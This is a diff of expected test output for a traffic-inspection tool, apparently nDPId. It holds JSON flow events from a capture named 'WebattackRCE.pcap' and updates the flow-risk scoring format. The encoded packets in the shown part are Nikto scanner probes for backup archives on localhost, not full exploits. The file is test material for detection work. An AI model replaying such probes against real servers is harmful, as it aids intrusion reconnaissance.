 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277216,"pkt":"AAAAAAAAAAAAAAAACABFAADC6alAAEAGUop\/AAABfwAAAcQwH5AB5dFAi0ifwYAYAED+tgAAAQEICp1m\/QidZv0IR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277217,"pkt":"AAAAAAAAAAAAAAAACABFAADHXwtAAEAG3SN\/AAABfwAAAcQyH5CeyGeSqwnqXYAYAED+uwAAAQEICp1m\/QmdZv0JR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277218,"pkt":"AAAAAAAAAAAAAAAACABFAADHKPlAAEAGEzZ\/AAABfwAAAcQ0H5BMBRBwjCFtgIAYAED+uwAAAQEICp1m\/QqdZv0KR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277219,"pkt":"AAAAAAAAAAAAAAAACABFAADE4jtAAEAGWfZ\/AAABfwAAAcQ2H5DSrNqhX1PVN4AYAED+uAAAAQEICp1m\/QudZv0LR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277221,"pkt":"AAAAAAAAAAAAAAAACABFAADEaVlAAEAG0th\/AAABfwAAAcQ4H5ChqlHP+pxqwIAYAED+uAAAAQEICp1m\/Q2dZv0NR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277222,"pkt":"AAAAAAAAAAAAAAAACABFAADCu\/NAAEAGgEB\/AAABfwAAAcQ6H5D46YNpMAqH8IAYAED+tgAAAQEICp1m\/Q6dZv0OR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277224,"pkt":"AAAAAAAAAAAAAAAACABFAADCyzFAAEAGcQJ\/AAABfwAAAcQ8H5A0R\/O25IFzRIAYAED+tgAAAQEICp1m\/RCdZv0PR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277225,"pkt":"AAAAAAAAAAAAAAAACABFAAC90OxAAEAGa0x\/AAABfwAAAcQ+H5C1k+hxPtlM+IAYAED+sQAAAQEICp1m\/RGdZv0RR0VUIC8wLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
